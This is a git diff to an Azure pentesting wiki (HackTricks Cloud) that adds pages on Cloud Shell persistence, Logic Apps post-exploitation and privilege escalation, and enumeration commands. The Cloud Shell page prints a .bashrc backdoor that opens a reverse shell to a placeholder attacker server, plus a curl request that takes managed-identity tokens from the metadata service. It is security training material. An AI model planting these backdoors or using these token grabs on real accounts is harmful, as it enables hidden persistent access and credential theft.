diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index d05776c716..4d0520541a 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -409,6 +409,7 @@
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
- [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
+ - [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md)
- [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md)
@@ -452,6 +453,7 @@
- [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
+ - [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md)
- [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
@@ -471,6 +473,7 @@
- [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
- [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
- [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
+ - [Az - Logic Apps Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md)
- [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md)
- [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md)
- [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
@@ -480,6 +483,7 @@
- [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md)
- [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md)
- [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
+ - [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
- [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
- [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
new file mode 100644
index 0000000000..7e6749b1d4
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md
@@ -0,0 +1,56 @@
+# Az - Cloud Shell Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking: (1) (1) (1).png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking:  (1).png)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Cloud Shell Persistence
+
+Azure Cloud Shell offers command-line access to manage Azure resources with persistent storage and automatic authentication. Attackers can exploit this by placing backdoors in the persistent home directory:
+
+* **Persistent Storage**: Azure Cloud Shell’s home directory is mounted on an Azure file share and remains intact even after the session ends.
+* **Startup Scripts**: Files like .bashrc execute automatically at the start of each session, allowing for persistent execution when the cloud shell starts.
+
+Example backdoor in .bashrc:
+
+{% code overflow="wrap" %}
+```bash
+echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/$CCSERVER/443 0>&1 &)' >> $HOME/.bashrc
+```
+{% endcode %}
+
+This backdoor can execute commands even 5 minutes after the cloud shell is finished by the user.
+
+Additionally query Azure’s metadata service for instance details and tokens:
+{% code overflow="wrap" %}
+```bash
+curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" -s
+```
+{% endcode %}
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md
new file mode 100644
index 0000000000..99c3076ea3
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md
@@ -0,0 +1,183 @@
+# Az - Logic Apps Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Logic Apps Database Post Exploitation
+For more information about logic apps check:
+
+{% content-ref url="../az-services/az-logic-apps.md" %}
+[az-logic-apps.md](../az-services/az-logic-apps.md)
+{% endcontent-ref %}
+
+### "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action"
+With these permissions, you can modify Logic App workflows and manage their identities. Specifically, you can assign or remove system-assigned and user-assigned managed identities to workflows, which allows the Logic App to authenticate and access other Azure resources without explicit credentials.
+
+{% code overflow="wrap" %}
+```bash
+az logic workflow identity remove/assign \
+ --name \
+ --resource-group \
+ --system-assigned true \
+ --user-assigned "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/"
+```
+{% endcode %}
+
+### "Microsoft.Web/sites/read", "Microsoft.Web/sites/write"
+With these permissions, you can create or update Logic Apps hosted on an App Service Plan. This includes modifying settings such as enabling or disabling HTTPS enforcement.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp update \
+ --resource-group \
+ --name \
+ --set httpsOnly=false
+```
+{% endcode %}
+
+### "Microsoft.Web/sites/stop/action", "Microsoft.Web/sites/start/action" || "Microsoft.Web/sites/restart/action"
+With this permission, you can start/stop/restart a web app, including Logic Apps hosted on an App Service Plan. This action ensures that a previously stopped app is brought online and resumes its functionality. This can disrupt workflows, trigger unintended operations, or cause downtime by starting, stopping, or restarting Logic Apps unexpectedly.
+
+{% code overflow="wrap" %}
+```bash
+az webapp start/stop/restart \
+ --name \
+ --resource-group
+```
+{% endcode %}
+
+
+### "Microsoft.Web/sites/config/list/action", "Microsoft.Web/sites/read" && "Microsoft.Web/sites/config/write"
+
+With this permission, you can configure or modify settings for web apps, including Logic Apps hosted on an App Service Plan. This allows changes to app settings, connection strings, authentication configurations, and more.
+
+{% code overflow="wrap" %}
+```bash
+az logicapp config appsettings set \
+ --name \
+ --resource-group \
+ --settings "="
+```
+{% endcode %}
+
+### "Microsoft.Logic/integrationAccounts/write"
+With this permission, you can create, update, or delete Azure Logic Apps integration accounts. This includes managing integration account-level configurations like maps, schemas, partners, agreements, and more.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account create \
+ --resource-group \
+ --name \
+ --location \
+ --sku \
+ --state Enabled
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/batchConfigurations/write"
+
+With this permission, you can create or modify batch configurations within an Azure Logic Apps integration account. Batch configurations define how Logic Apps process and group incoming messages for batch processing.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account batch-configuration create \
+ --resource-group \
+ --integration-account-name \
+ --name \
+ --release-criteria '{
+ "messageCount": 100,
+ "batchSize": 1048576,
+ }'
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/maps/write"
+With this permission, you can create or modify maps within an Azure Logic Apps integration account. Maps are used to transform data from one format to another, enabling seamless integration between different systems and applications.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account map create \
+ --resource-group \
+ --integration-account-name \
+ --name \
+ --map-type \
+ --content-type application/xml \
+ --map-content map-content.xslt
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/partners/write"
+With this permission, you can create or modify partners in an Azure Logic Apps integration account. Partners represent entities or systems that participate in business-to-business (B2B) workflows.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account partner create \
+ --resource-group \
+ --integration-account-name \
+ --name \
+ --partner-type \
+ --content '{
+ "b2b": {
+ "businessIdentities": [
+ {
+ "qualifier": "ZZ",
+ "value": "TradingPartner1"
+ }
+ ]
+ }
+ }'
+```
+{% endcode %}
+
+### "Microsoft.Resources/subscriptions/resourcegroups/read" && "Microsoft.Logic/integrationAccounts/sessions/write"
+With this permission, you can create or modify sessions within an Azure Logic Apps integration account. Sessions are used in B2B workflows to group messages and track related transactions over a defined period.
+
+{% code overflow="wrap" %}
+```bash
+az logic integration-account session create \
+ --resource-group \
+ --integration-account-name \
+ --name \
+ --content '{
+ "properties": {
+ "sessionId": "session123",
+ "data": {
+ "key1": "value1",
+ "key2": "value2"
+ }
+ }
+ }'
+```
+{% endcode %}
+
+### "*/delete"
+With this permissions you can delete resources related to Azure Logic Apps
+
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
new file mode 100644
index 0000000000..dcbc7b4465
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
@@ -0,0 +1,79 @@
+# Az - Logic Apps Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Logic Apps Privesc
+For more information about SQL Database check:
+
+{% content-ref url="../az-services/az-logic-apps.md" %}
+[az-logic-apps.md](../az-services/az-logic-apps.md)
+{% endcontent-ref %}
+
+### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action")
+
+With this permission, you can create or update, Azure Logic Apps workflows. Workflows define automated processes and integrations between various systems and services.
+
+{% code overflow="wrap" %}
+```bash
+az logic workflow create \
+ --resource-group \
+ --name \
+ --definition \
+ --location
+
+az logic workflow update \
+ --name my-new-workflow \
+ --resource-group logicappgroup \
+ --definition
+```
+{% endcode %}
+
+And after changing it, you can run it with:
+
+```bash
+az rest \
+ --method post \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/run?api-version=2016-10-01" \
+ --body '{}' \
+ --headers "Content-Type=application/json"
+```
+
+### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action")
+With these permissions, you can deploy, Logic App workflows using ZIP file deployments. These permissions enable actions such as reading app details, accessing publishing credentials, writing changes, and listing app configurations. Alongside the start permissions you can update and deploy a new Logic App with the content desired
+
+{% code overflow="wrap" %}
+```bash
+az logicapp deployment source config-zip \
+ --name \
+ --resource-group \
+ --src
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-services.md b/src/pentesting-cloud/azure-security/az-services/az-app-services.md
index db148b13de..4170ba1f84 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-app-services.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-app-services.md
@@ -186,12 +186,56 @@ az webapp hybrid-connections list --name --resource-group
{{#tab name="Az Powershell" }}
```bash
+Get-Command -Module Az.Websites
+
# Get App Services and Function Apps
Get-AzWebApp
# Get only App Services
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
-```
+# Retrieves details of a specific App Service Environment in the specified resource group.
+Get-AzAppServiceEnvironment -ResourceGroupName -Name
+# Retrieves the access restriction configuration for a specified Web App.
+Get-AzWebAppAccessRestrictionConfig -ResourceGroupName -Name
+# Retrieves the SSL certificates for a specified resource group.
+Get-AzWebAppCertificate -ResourceGroupName
+# Retrieves the continuous deployment URL for a containerized Web App.
+Get-AzWebAppContainerContinuousDeploymentUrl -ResourceGroupName -Name
+# Retrieves the list of continuous WebJobs for a specified Web App.
+Get-AzWebAppWebJob -ResourceGroupName -AppName
+# Retrieves the list of triggered WebJobs for a specified Web App.
+Get-AzWebAppTriggeredWebJob -ResourceGroupName -AppName
+
+# Retrieves details of a deleted Web App in the specified resource group.
+Get-AzDeletedWebApp -ResourceGroupName -Name
+# Retrieves a list of snapshots for a specified Web App.
+Get-AzWebAppSnapshot -ResourceGroupName -Name
+# Retrieves the history of a specific triggered WebJob for a Web App.
+Get-AzWebAppTriggeredWebJobHistory -ResourceGroupName -AppName -Name
+
+# Retrieves information about deployment slots for a specified Web App.
+Get-AzWebAppSlot -ResourceGroupName -Name
+# Retrieves the continuous WebJobs for a specific deployment slot of a Web App.
+Get-AzWebAppSlotWebJob -ResourceGroupName -AppName -SlotName
+# Retrieves the triggered WebJobs for a specific deployment slot of a Web App.
+Get-AzWebAppSlotTriggeredWebJob -ResourceGroupName -AppName -SlotName
+# Retrieves the history of a specific triggered WebJob for a deployment slot of a Web App.
+Get-AzWebAppSlotTriggeredWebJobHistory -ResourceGroupName -AppName -SlotName -Name
+# Retrieves the continuous WebJobs for a Web App.
+Get-AzWebAppContinuousWebJob -ResourceGroupName -AppName
+# Retrieves the continuous WebJobs for a specific deployment slot of a Web App.
+Get-AzWebAppSlotContinuousWebJob -ResourceGroupName -AppName -SlotName
+
+# Retrieves the traffic routing rules for a Web App.
+Get-AzWebAppTrafficRouting -ResourceGroupName -WebAppName -RuleName
+
+# Retrieves details of a specific backup for a Web App.
+Get-AzWebAppBackup -ResourceGroupName -Name -BackupId
+# Retrieves the backup configuration for a Web App.
+Get-AzWebAppBackupConfiguration -ResourceGroupName -Name
+# Retrieves the list of all backups for a Web App.
+Get-AzWebAppBackupList -ResourceGroupName -Name
+```
{{#endtab }}
{{#tab name="az get all" }}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
new file mode 100644
index 0000000000..a8b4069f55
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-cloud-shell.md
@@ -0,0 +1,58 @@
+# Az - Cloud Shell
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
+
+## Azure Cloud Shell
+
+**Azure Cloud Shell** is an interactive, authenticated, browser-accessible terminal designed for managing Azure resources, offering the flexibility to work with either Bash or PowerShell. It runs on a temporary, per-session host that times out after 20 minutes of inactivity, while persisting files in the $HOME location using a 5-GB file share. Cloud Shell can be accessed through multiple points, including the Azure portal, shell.azure.com, Azure CLI and PowerShell documentation, the Azure mobile app, and the Visual Studio Code Azure Account extension.
+
+There aren't permissions assigned to this service, therefore the aren't privilege escalation techniques. Also there isn't any kind of enumeration.
+
+### Key Features
+
+**Environment**:Azure Cloud Shell provides a secure environment by running on Azure Linux, Microsoft’s own Linux distribution designed for cloud infrastructure. All packages included in the Azure Linux repository are internally compiled by Microsoft to guard against supply chain attacks.
+**Preinstalled Tools**: Cloud Shell includes a comprehensive set of preinstalled tools such as Azure CLI, Azure PowerShell, Terraform, Docker CLI, Ansible, Git, and text editors like vim, nano, and emacs. These tools are ready to use. To list the installed packeges and modules you can use "Get-Module -ListAvailable", "tdnf list" and "pip3 list".
+**$HOME persistence**: When starting Azure Cloud Shell for the first time, you can use it with or without an attached storage account. Choosing not to attach storage creates an ephemeral session where files are deleted when the session ends. To persist files across sessions, mount a storage account, which attaches automatically as **$HOME\clouddrive**, with your **$HOME** directory saved as an **.img** file in Azure File Share. However, files outside $HOME and machine states are not persisted. For securely storing secrets like SSH keys, use Azure Key Vault.
+**Azure drive (Azure:)**: PowerShell in Azure Cloud Shell includes the Azure drive (Azure:), which allows easy navigation of Azure resources like Compute, Network, and Storage using filesystem-like commands. Switch to the Azure drive with cd Azure: and return to your home directory with cd ~. You can still use Azure PowerShell cmdlets to manage resources from any drive.
+**Custom Tool Installation**: Users who configure Cloud Shell with a storage account can install additional tools that do not require root permissions. This feature allows for further customization of the Cloud Shell environment, enabling users to tailor their setup to their specific needs.
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/cloud-shell/overview](https://learn.microsoft.com/en-us/azure/cloud-shell/overview)
+* [https://learn.microsoft.com/en-us/azure/cloud-shell/features](https://learn.microsoft.com/en-us/azure/cloud-shell/features)
+* [https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window](https://learn.microsoft.com/en-us/azure/cloud-shell/using-the-shell-window)
+
+
+## Persistence
+
+{% content-ref url="../az-privilege-escalation/az-cloud-shell-persistence.md" %}
+[az-cloud-shell-persistence.md](../az-privilege-escalation/az-cloud-shell-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
index fdf9235ed1..5374e6bd78 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-cosmosDB.md
@@ -248,7 +248,6 @@ az cosmosdb mongodb collection list --account-name --database-name
az cosmosdb mongodb role definition list --account-name --resource-group
# List all user definitions for MongoDB within an Azure Cosmos DB account
az cosmosdb mongodb user definition list --account-name --resource-group
-
```
{% endcode %}
{% endtab %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-function-apps.md b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
index 1c37462efb..f7610ce282 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-function-apps.md
@@ -207,6 +207,9 @@ Moreover, **no source code will be stored in the storage** account related to th
## Enumeration
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# List all the functions
az functionapp list
@@ -252,6 +255,29 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func
# Get source code
az rest --url "https://management.azure.com//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.Functions
+
+# Lists all Function Apps in the current subscription or in a specific resource group.
+Get-AzFunctionApp -ResourceGroupName
+
+# Displays the regions where Azure Function Apps are available for deployment.
+Get-AzFunctionAppAvailableLocation
+
+# Retrieves details about Azure Function App plans in a subscription or resource group.
+Get-AzFunctionAppPlan -ResourceGroupName -Name
+
+# Retrieves the app settings for a specific Azure Function App.
+Get-AzFunctionAppSetting -Name -ResourceGroupName
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
## Privilege Escalation
diff --git a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
index 99893093b6..cf1f1a4eb2 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
@@ -32,41 +32,262 @@ For example, something like this won't return the token:
curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v
```
-### Enumeration
+### Hosting options
+
+There are several hosting options:
-{{#tabs }}
-{{#tab name="az cli" }}
+* **Consumption**
+ - **Multi-tenant**: provides shared compute resources, operates in the public cloud, and follows a pay-per-operation pricing model. This is ideal for lightweight and cost-effective workloads.
+* **Standard**
+ - **Workflow Service Plan**: dedicated compute resources with VNET integration for networking and charges per workflow service plan instance. It is suitable for more demanding workloads requiring greater control.
+ - **App Service Environment V3** dedicated compute resources with full isolation and scalability. It also integrates with VNET for networking and uses a pricing model based on App Service instances within the environment. This is ideal for enterprise-scale applications needing high isolation.
+ - **Hybrid** designed for local processing and multi-cloud support. It allows customer-managed compute resources with local network access and utilizes Kubernetes Event-Driven Autoscaling (KEDA).
+
+### Enumeration
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# List
-az logic workflow list --resource-group --subscription --output table
+az logic workflow list --resource-group
# Get info
-az logic workflow show --name --resource-group --subscription
-# Get Logic App config
-az logic workflow definition show --name --resource-group --subscription
-# Get service ppal used
-az logic workflow identity show --name --resource-group --subscription
-```
+az logic workflow show --name --resource-group
+
+# Get details of a specific Logic App workflow, including its connections and parameters
+az rest \
+ --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}?api-version=2016-10-01&$expand=connections.json,parameters.json" \
+ --headers "Content-Type=application/json"
+
+# Get details about triggers for a specific Logic App
+az rest --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers?api-version=2016-06-01"
+
+# Get the callback URL for a specific trigger in a Logic App
+az rest --method POST \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/listCallbackUrl?api-version=2016-06-01"
+
+# Get the history of a specific trigger in a Logic App
+az rest --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/histories?api-version=2016-06-01"
+
+# List all runs of a specific Logic App workflow
+az rest \
+ --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs?api-version=2016-06-01" \
+ --headers "Content-Type=application/json"
+
+# Get all actions within a specific run of a Logic App workflow
+az rest \
+ --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs/{runName}/actions?api-version=2016-06-01" \
+ --headers "Content-Type=application/json"
+
+# List all versions of a specific Logic App workflow
+az rest \
+ --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions?api-version=2016-06-01" \
+ --headers "Content-Type=application/json"
+
+# Get details of a specific version of a Logic App workflow
+az rest \
+ --method GET \
+ --uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions/{versionName}?api-version=2016-06-01" \
+ --headers "Content-Type=application/json"
+
+az rest \
+ --method GET \
+ --uri "https://examplelogicapp1994.scm.azurewebsites.net/api/functions/admin/download?includeCsproj=true&includeAppSettings=true" \
+ --headers "Content-Type=application/json"
+
+# List all Logic Apps in the specified resource group
+az logicapp list --resource-group
+
+# Show detailed information about a specific Logic App
+az logicapp show --name --resource-group
-{{#endtab }}
+# List all application settings for a specific Logic App
